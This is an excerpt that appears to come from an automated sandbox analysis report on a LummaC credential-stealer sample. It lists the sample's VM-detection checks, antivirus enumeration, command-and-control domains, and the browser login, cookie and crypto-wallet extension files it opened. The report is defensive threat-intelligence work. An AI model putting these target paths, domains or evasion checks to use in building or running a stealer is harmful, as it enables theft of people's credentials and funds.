Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\vPqd8HLs88.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\vPqd8HLs88.exe TID: 7924

Thread sleep time: -120000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\vPqd8HLs88.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: vPqd8HLs88.exe, 00000000.00000003.1451333811.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: vPqd8HLs88.exe, 00000000.00000003.1451333811.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696501413o
Source: vPqd8HLs88.exe, 00000000.00000003.1451333811.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: Amcache.hve.5.dr	Binary or memory string: VMware
Source: vPqd8HLs88.exe, 00000000.00000003.1451333811.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: vPqd8HLs88.exe, 00000000.00000003.1451333811.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696501413j
Source: vPqd8HLs88.exe, 00000000.00000003.1451333811.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: Amcache.hve.5.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: vPqd8HLs88.exe, 00000000.00000003.1555845377.000000000057B000.00000004.00000020.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1511725353.000000000057B000.00000004.00000020.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1534520695.000000000057B000.00000004.00000020.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000002.1667413749.000000000052E000.00000004.00000020.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000002.1667413749.000000000057B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: vPqd8HLs88.exe, 00000000.00000003.1451333811.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
Source: Amcache.hve.5.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: vPqd8HLs88.exe, 00000000.00000003.1451333811.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: vPqd8HLs88.exe, 00000000.00000003.1451333811.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: vPqd8HLs88.exe, 00000000.00000003.1451333811.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: Amcache.hve.5.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.5.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: vPqd8HLs88.exe, 00000000.00000003.1451333811.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: vPqd8HLs88.exe, 00000000.00000003.1451333811.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: Amcache.hve.5.dr	Binary or memory string: VMware VMCI Bus Device
Source: vPqd8HLs88.exe, 00000000.00000003.1451333811.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual RAM
Source: vPqd8HLs88.exe, 00000000.00000003.1451333811.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: Amcache.hve.5.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: vPqd8HLs88.exe, 00000000.00000003.1451333811.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: vPqd8HLs88.exe, 00000000.00000003.1451333811.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696501413
Source: Amcache.hve.5.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual USB Mouse
Source: vPqd8HLs88.exe, 00000000.00000003.1451333811.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: vPqd8HLs88.exe, 00000000.00000003.1451333811.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696501413\|UE
Source: vPqd8HLs88.exe, 00000000.00000003.1451333811.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: vPqd8HLs88.exe, 00000000.00000003.1451333811.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: Amcache.hve.5.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: vPqd8HLs88.exe, 00000000.00000003.1451333811.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: Amcache.hve.5.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: vPqd8HLs88.exe, 00000000.00000003.1451333811.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696501413s
Source: vPqd8HLs88.exe, 00000000.00000003.1451333811.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: vPqd8HLs88.exe, 00000000.00000003.1451333811.0000000002F04000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696501413p
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.5.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: vPqd8HLs88.exe, 00000000.00000003.1451333811.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: vPqd8HLs88.exe, 00000000.00000003.1451333811.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: vPqd8HLs88.exe, 00000000.00000003.1451333811.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: Amcache.hve.5.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
Source: Amcache.hve.5.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: vPqd8HLs88.exe, 00000000.00000003.1451333811.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: vPqd8HLs88.exe, 00000000.00000003.1451333811.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: vPqd8HLs88.exe, 00000000.00000003.1451333811.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696501413
Source: vPqd8HLs88.exe, 00000000.00000003.1451333811.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: vPqd8HLs88.exe, 00000000.00000003.1451333811.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696501413f

Source: C:\Users\user\Desktop\vPqd8HLs88.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\vPqd8HLs88.exe

Code function: 0_2_0043B540 LdrInitializeThunk,

0_2_0043B540

Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00920083 push dword ptr fs:[00000030h]	0_2_00920083
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0095092B mov eax, dword ptr fs:[00000030h]	0_2_0095092B
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00950D90 mov eax, dword ptr fs:[00000030h]	0_2_00950D90

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: vPqd8HLs88.exe	String found in binary or memory: debonairnukk.xyz
Source: vPqd8HLs88.exe	String found in binary or memory: diffuculttan.xyz
Source: vPqd8HLs88.exe	String found in binary or memory: effecterectz.xyz
Source: vPqd8HLs88.exe	String found in binary or memory: deafeninggeh.biz
Source: vPqd8HLs88.exe	String found in binary or memory: immureprech.biz

Source: C:\Users\user\Desktop\vPqd8HLs88.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\vPqd8HLs88.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: vPqd8HLs88.exe, 00000000.00000003.1555845377.00000000005CB000.00000004.00000020.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000002.1667413749.00000000005CB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\vPqd8HLs88.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: vPqd8HLs88.exe PID: 7868, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: vPqd8HLs88.exe, 00000000.00000003.1534520695.00000000005D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum\wallets
Source: vPqd8HLs88.exe, 00000000.00000003.1534520695.00000000005D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\ElectronCash\wallets
Source: vPqd8HLs88.exe, 00000000.00000003.1534520695.00000000005D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/JAXX New Version
Source: vPqd8HLs88.exe, 00000000.00000003.1511725353.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: vPqd8HLs88.exe, 00000000.00000003.1534520695.00000000005D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: vPqd8HLs88.exe, 00000000.00000003.1534520695.00000000005D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: vPqd8HLs88.exe, 00000000.00000003.1511725353.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: vPqd8HLs88.exe, 00000000.00000003.1534520695.00000000005D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: vPqd8HLs88.exe, 00000000.00000003.1534497427.00000000005DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
